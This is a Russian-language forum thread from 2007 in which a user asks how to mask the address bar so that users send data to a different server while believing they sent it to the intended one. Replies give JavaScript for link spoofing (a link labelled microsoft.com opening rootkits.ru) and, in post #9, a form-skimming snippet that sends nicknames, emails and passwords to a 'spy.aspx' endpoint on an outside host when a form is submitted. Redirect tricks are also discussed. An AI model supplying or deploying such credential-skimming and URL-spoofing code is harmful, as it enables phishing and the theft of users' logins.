Сейчас на форуме: hgdagon, asfa (+4 невидимых)

 eXeL@B —› Программирование —› Маскировка URL
Посл.ответ Сообщение

Ранг: 37.5 (посетитель)
Активность: 0.020
Статус: Участник

Создано: 11 февраля 2007 13:34
· Личное сообщение · #1

Как в строку браузера записать, что-нибудь отличное от текущего URL. на JavaScript. Ну или может какие другие есть способы замаскировать текущий серевер.




Ранг: 80.5 (постоянный)
Активность: 0.030
Статус: Участник

Создано: 11 февраля 2007 14:12 · Поправил: apple
· Личное сообщение · #2

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<script language="JavaScript">
<!--
function makenew()
{
window.open("http://rootkits.ru/","blank","toolbar=no,width=800, height=600");
return false;
}
-->
</script>
<a href="http://www.microsoft.com" onClick="makenew()">ссылка</a>

</BODY>
</HTML>


Еще в эксплорере был баг с таблицами. Но помоему давно убрали. Читан на секлабе.
Почтовик JavaScript вырежет.

-----
ring 0




Ранг: 37.5 (посетитель)
Активность: 0.020
Статус: Участник

Создано: 11 февраля 2007 14:24
· Личное сообщение · #3

apple
Мне кажется, что при таком способе слишком заметно, что что-то делается не то. Мне нужно максимально замаскировать переход на другой сервак. Я уже думаю, так сделать не получится.




Ранг: 80.5 (постоянный)
Активность: 0.030
Статус: Участник

Создано: 11 февраля 2007 14:37
· Личное сообщение · #4

Stranger пишет:
Мне нужно максимально замаскировать переход на другой сервак.

То есть незаметно отправить какие-то данные или в наглую открыть страницу?

-----
ring 0




Ранг: 68.8 (постоянный)
Активность: 0.120
Статус: Участник

Создано: 11 февраля 2007 15:59 · Поправил: bash
· Личное сообщение · #5

Stranger
можешь немного поиграться с этим спуффом



Ранг: 68.8 (постоянный)
Активность: 0.120
Статус: Участник

Создано: 11 февраля 2007 16:15 · Поправил: bash
· Личное сообщение · #6

-



Ранг: 68.8 (постоянный)
Активность: 0.120
Статус: Участник

Создано: 11 февраля 2007 16:25
· Личное сообщение · #7

не цепляет, блин...

0092_11.02.2007_CRACKLAB.rU.tgz - spoof.zip



Ранг: 37.5 (посетитель)
Активность: 0.020
Статус: Участник

Создано: 12 февраля 2007 00:02
· Личное сообщение · #8

apple пишет:
То есть незаметно отправить какие-то данные или в наглую открыть страницу?

Надо отправить данные другому серваку, но так, чтобы все думали, что оправили тому, которому и хотели. В принципе, на строку адреса мало кто смотрит при серфинге, но все же лучше было бы в строке адреса написать "официальный" сервак.

bash
А в опере уже не работает. Да и в Есплорере 6 тоже.




Ранг: 80.5 (постоянный)
Активность: 0.030
Статус: Участник

Создано: 12 февраля 2007 00:46 · Поправил: apple
· Личное сообщение · #9

Stranger пишет:
Надо отправить данные другому серваку, но так, чтобы все думали, что оправили тому, которому и хотели.

А-ааа

<SCRIPT language=Javascript type=text/javascript>

function regMe( reg_nick, reg_face, reg_mail, reg_pwd1, reg_pwd2 )
{
istat1 = new Image(1,1);
istat1.src = "http://site.ru/spy.aspx?reg_nick="+reg_nick.value+"&reg_fa ce="+reg_face.value+"&reg_mail="+reg_mail.value+"&reg_pwd1="+reg_pwd1. value+"&reg_pwd2="+reg_pwd2.value;
return true;
}
</SCRIPT>

Если это форма, то

OnSubmit="return regMe(this.reg_nick, this.reg_face, this.reg_mail, this.reg_pwd1, this.reg_pwd2)"


Если ссылка, то OnClick

[add]
this.reg_nick
this.reg_face
this.reg_mail
this.reg_pwd1
this.reg_pwd2
-это все имена контролов, входящих в форму.

-----
ring 0




Ранг: 68.8 (постоянный)
Активность: 0.120
Статус: Участник

Создано: 12 февраля 2007 05:41
· Личное сообщение · #10

Stranger пишет:
А в опере уже не работает. Да и в Есплорере 6 тоже

у мну во всём этом работает




Ранг: 213.0 (наставник), 4thx
Активность: 0.220
Статус: Участник
Тот ещё Lamer

Создано: 12 февраля 2007 07:05
· Личное сообщение · #11

Stranger пишет:
Мне нужно максимально замаскировать переход на другой сервак

Может я не так понял... Но не проще ли сначала отправить на любую страницу, в которой только прописать редирект на нужную с таймером 0 ???

-----
Do Not Get Mad Get Money! ;)





Ранг: 80.5 (постоянный)
Активность: 0.030
Статус: Участник

Создано: 12 февраля 2007 07:14
· Личное сообщение · #12

Talula пишет:
в которой только прописать редирект на нужную с таймером 0 ???

Нет. Тогда лучше
header location в PHP
или Response.Redirect(site, true) в php

-----
ring 0




Ранг: 37.5 (посетитель)
Активность: 0.020
Статус: Участник

Создано: 12 февраля 2007 10:15 · Поправил: Stranger
· Личное сообщение · #13

Похоже apple не совсем меня понял. Сайт чужой - никакого пхп я туда не впишу. Просто поститься на сайте site1.ru ссылка вида http://site1.ru/dir/script.php?param=1 http://site2.ru/dir/script.php?param=1 . Надеюсь, заметили фишку. И чересчур дотошный юзер может заметить в строке адреса подмену, особенно если разница в названиях большая. А это крайне нежелательно.

bash
Опера выдает предупреждение, после нажатия ничего не грузится; В Експлорере просто ничего не грузится.




Ранг: 80.5 (постоянный)
Активность: 0.030
Статус: Участник

Создано: 12 февраля 2007 10:23
· Личное сообщение · #14

Stranger пишет:
Сайт чужой - никакого пхп я туда не впишу.

Если site1 и site2 - чужие сайты, то я тебя не понял.

-----
ring 0





Ранг: 213.0 (наставник), 4thx
Активность: 0.220
Статус: Участник
Тот ещё Lamer

Создано: 12 февраля 2007 11:45
· Личное сообщение · #15

оффтоп:
"сайт чужой - я просто разместил объяву!" Гы =)))

-----
Do Not Get Mad Get Money! ;)



 eXeL@B —› Программирование —› Маскировка URL
:: Ваш ответ
Жирный  Курсив  Подчеркнутый  Перечеркнутый  {mpf5}  Код  Вставить ссылку 
:s1: :s2: :s3: :s4: :s5: :s6: :s7: :s8: :s9: :s10: :s11: :s12: :s13: :s14: :s15: :s16:


Максимальный размер аттача: 500KB.
Ваш логин: german1505 » Выход » ЛС
   Для печати Для печати